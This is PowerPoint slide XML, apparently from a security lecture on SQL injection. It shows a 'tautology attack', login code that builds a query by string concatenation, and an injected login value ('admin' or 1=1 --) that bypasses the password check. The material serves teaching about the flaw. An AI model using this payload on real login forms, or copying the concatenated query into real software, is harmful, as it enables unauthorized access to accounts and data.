          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506896" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="336096" y="5607316"/>
            <a:ext cx="5918421" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tautology attack (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>any condition or true = true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3174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6736896" y="1492516"/>
            <a:ext cx="2047875" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3841296" y="1873516"/>
            <a:ext cx="2895600" cy="1027814"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7194096" y="2254516"/>
            <a:ext cx="152400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4298496" y="5988316"/>
            <a:ext cx="0" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="336096" y="6294604"/>
            <a:ext cx="8327571" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>select member_id, member_level from members where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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2459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06890"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50689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06892"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="506892"/>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06891"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50689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6893"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50689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6894"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="506894"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50689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06895"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="506895"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50689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06896"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="506896"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50689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91" grpId="0"/>
      <p:bldP spid="506892" grpId="0" animBg="1"/>
      <p:bldP spid="506893" grpId="0" animBg="1"/>
      <p:bldP spid="506894" grpId="0"/>
      <p:bldP spid="506895" grpId="0" animBg="1"/>
      <p:bldP spid="506896" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>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950CE0-C25C-4339-80BC-8A6AE85CE61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More clearly…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D3478E0-0961-47FE-B391-0D83914B5DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426128" y="1752600"/>
            <a:ext cx="8260672" cy="4373563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Bill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = password123</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r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		   from members where ";</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r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +  "’ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =’"  + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + "’";</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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28064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92CD-28F5-4408-A64C-648167660A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would result in…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F828EE9-508A-46E1-BD59-76849D9E663C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_level</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  from members </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘Bill’ and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘password123’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="431066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950CE0-C25C-4339-80BC-8A6AE85CE61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D3478E0-0961-47FE-B391-0D83914B5DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426128" y="1752600"/>
            <a:ext cx="8260672" cy="4373563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = admin’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘’</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r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
